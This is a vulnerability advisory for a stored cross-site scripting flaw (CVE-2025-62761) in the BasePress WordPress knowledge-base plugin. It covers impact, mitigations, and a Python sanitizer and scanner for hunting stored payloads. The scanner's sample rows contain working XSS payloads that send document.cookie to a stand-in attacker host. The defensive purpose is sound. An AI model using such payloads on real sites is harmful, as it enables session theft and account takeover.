
CVE-2025-62761: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in BasePress Knowledge Base documentation & wiki plugin – BasePress

Severity: Medium
Published: Wed Dec 31 2025 (12/31/2025, 08:44:22 UTC)
Source: CVE Database V5
Vendor/Project: BasePress
Product: Knowledge Base documentation & wiki plugin – BasePress

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BasePress Knowledge Base documentation & wiki plugin – BasePress allows Stored XSS. This issue affects Knowledge Base documentation & wiki plugin – BasePress: from n/a through 2.17.0.1.

AI-Powered Analysis

Last updated: 01/20/2026, 22:40:21 UTC

Technical Analysis

CVE-2025-62761 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in the BasePress Knowledge Base documentation & wiki plugin for WordPress. The plugin fails to neutralize user-supplied input before including it in generated pages, so an attacker who can create or edit knowledge-base content can store a script payload that executes in the browser of every user who later views the affected article. Because the script runs under the site's origin, it can read what the victim's browser can read and issue requests the victim is authorized to make; when the viewer is an administrator, that is enough to perform privileged actions through the WordPress admin interface (for example creating an administrator account or installing a plugin), so the practical impact ranges from session or token theft to privilege escalation.

All versions through 2.17.0.1 are affected. The CVSS v3.1 base score is 6.5 (Medium): network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L, i.e. an authenticated account able to author or edit plugin content) and user interaction required (UI:R), since a victim must open the poisoned page. The scope is changed (S:C) because the vulnerable component is the server-side plugin while the payload executes in the victim's browser, a different security authority.

No public exploit was known at the time of analysis and no fixed version is recorded in this entry, so organisations relying on BasePress for knowledge-base or wiki functionality should reduce exposure now rather than wait, especially where several users hold editing rights. The root cause is the familiar one for stored XSS: content is trusted at render time instead of being encoded for the HTML context in which it appears.

Potential Impact

For European organisations, the vulnerability allows script execution inside internal or customer-facing knowledge-base portals built on BasePress. A stored payload runs for every viewer, so a single malicious or compromised low-privilege account can compromise the sessions of more privileged users, exfiltrate information visible to them, or chain into further attacks such as privilege escalation and lateral movement through the WordPress site. The risk grows with the number of accounts that can author or edit content.

Confidentiality is partially at risk if session cookies, tokens or page contents are read by the injected script. Integrity and availability are at risk through defacement, injected redirects or content that breaks page rendering. The Medium rating reflects that exploitation needs an account and a victim's visit, but for organisations subject to GDPR a knowledge base holding personal data or internal procedures is still a meaningful exposure: exploitation may trigger breach-notification obligations, with the attendant reputational and regulatory consequences.

Mitigation Recommendations

1. Restrict who can create or edit knowledge-base content to trusted users. Review which WordPress roles the plugin grants editing capabilities to, and remove or downgrade contributor and author accounts that do not need them.
2. Do not rely on input filtering alone. If you maintain custom templates, shortcodes or extensions that render plugin content, escape at output time with the WordPress escaping functions appropriate to the context (esc_html(), esc_attr(), esc_url(), or wp_kses_post() for content that legitimately contains limited HTML).
3. Monitor knowledge-base articles and their revisions for unexpected changes, in particular script tags, event-handler attributes (onerror, onload, onclick and similar) and javascript: URLs, and alert on edits by low-privilege accounts.
4. Deploy a Content-Security-Policy header that restricts script-src to the site's own origin and known script hosts and avoids 'unsafe-inline'. WordPress and many plugins emit inline scripts, so roll the policy out in Content-Security-Policy-Report-Only mode first and tighten it once violations are understood.
5. Back up knowledge-base content regularly so defaced or corrupted articles can be restored quickly.
6. Watch for BasePress releases newer than 2.17.0.1 and apply the fix as soon as the vendor publishes one.
7. Train users with editing rights to recognise and report suspicious content changes or unexpected behaviour in the knowledge base.
8. Where feasible, isolate the knowledge-base site or limit its exposure to external networks, for example by placing internal documentation behind VPN or SSO.
9. Use a web application firewall configured to detect and block XSS payloads submitted to the plugin's content endpoints, as a compensating control rather than a fix.
10. Perform periodic security assessments and penetration tests focused on the knowledge-base platform to identify residual risk.
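One way to implement the output-side check that items 2 and 3 describe, as an added example that is not BasePress or WordPress code: an allow-list sanitizer in the style of WordPress's KSES, and a scanner that runs it over exported knowledge-base rows to flag stored content that would be altered (a cheap way to hunt for payloads already in the database). The tag and attribute allow-list, the row layout and the sample rows are constructed assumptions.

```python
"""Allow-list HTML sanitizer plus a scanner for stored knowledge-base content.

Added example, not BasePress or WordPress code. It mirrors the KSES approach
(allow-list of tags and attributes, URL scheme check) in plain Python so it can
run offline over an exported table. ALLOWED, the row layout and SAMPLE_ROWS are
constructed assumptions.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags an article may contain, mapped to the attributes permitted on each.
ALLOWED = {
    "p": set(), "br": set(), "strong": set(), "em": set(), "code": set(),
    "pre": set(), "ul": set(), "ol": set(), "li": set(), "h2": set(), "h3": set(),
    "a": {"href", "title"},
    "img": {"src", "alt"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
# Browsers ignore tabs/newlines inside a URL, so "java\tscript:" still runs;
# strip C0 controls and spaces before inspecting the scheme.
CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def url_is_safe(value):
    scheme = urlparse(CONTROL_CHARS.sub("", value)).scheme  # urlparse lowercases it
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Re-serialise input keeping only allow-listed markup; record what was removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (kind, detail) for every element/attribute removed
        self._skip = 0      # >0 while inside <script>/<style>: their text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            self.dropped.append(("tag", tag))
            return
        if self._skip:
            return
        if tag not in ALLOWED:
            self.dropped.append(("tag", tag))   # tag removed, its text is kept
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):           # onerror, onload, onclick, ...
                self.dropped.append(("handler", f"{tag}@{name}"))
            elif name not in ALLOWED[tag]:
                self.dropped.append(("attr", f"{tag}@{name}"))
            elif name in URL_ATTRS and not url_is_safe(value):
                self.dropped.append(("url", f"{tag}@{name}={value}"))
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))  # text is always re-encoded


def sanitize(html):
    """Return (clean_html, dropped) for one stored article body."""
    parser = AllowListSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


def scan_rows(rows):
    """Flag rows whose stored body contains anything the allow-list would remove.

    rows: iterable of (post_id, author, content), e.g. a wp_posts export
    filtered to the knowledge-base post type (assumed layout).
    """
    findings = []
    for post_id, author, content in rows:
        _, dropped = sanitize(content)
        if dropped:
            findings.append({"post_id": post_id, "author": author, "dropped": dropped})
    return findings


# Constructed sample rows: one benign article and two carrying XSS payloads.
SAMPLE_ROWS = [
    (101, "docs_editor",
     '<h2>Reset a password</h2><p>Go to <a href="https://kb.example.test/reset">Reset</a>.</p>'),
    (102, "contributor7",
     '<p>Helpful tip</p><img src="x" onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">'),
    (103, "contributor7",
     '<p>See <a href="javascript:alert(document.domain)">here</a></p>'
     "<script>new Image().src='https://attacker.example/s?'+document.cookie</script>"),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

The sanitizer is deliberately an allow-list: anything not explicitly permitted is removed, which is what makes it usable as a detector as well (a row that the allow-list would change is a row worth a human look). Text nodes are always re-encoded, so `&lt;script&gt;` in a legitimate article survives unchanged while a real `<script>` element and its body are removed. Running the scanner on a database export is a one-off hunt; it does not replace fixing the rendering path or upgrading the plugin once a fix ships.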


Technical Details

Data Version: 5.2
Assigner Short Name: Patchstack
Date Reserved: 2025-10-21T14:59:54.790Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 6954e5cfdb813ff03ed8c529

Added to database: 12/31/2025, 8:58:55 AM

Last enriched: 1/20/2026, 10:40:21 PM

Last updated: 2/4/2026, 10:40:16 PM
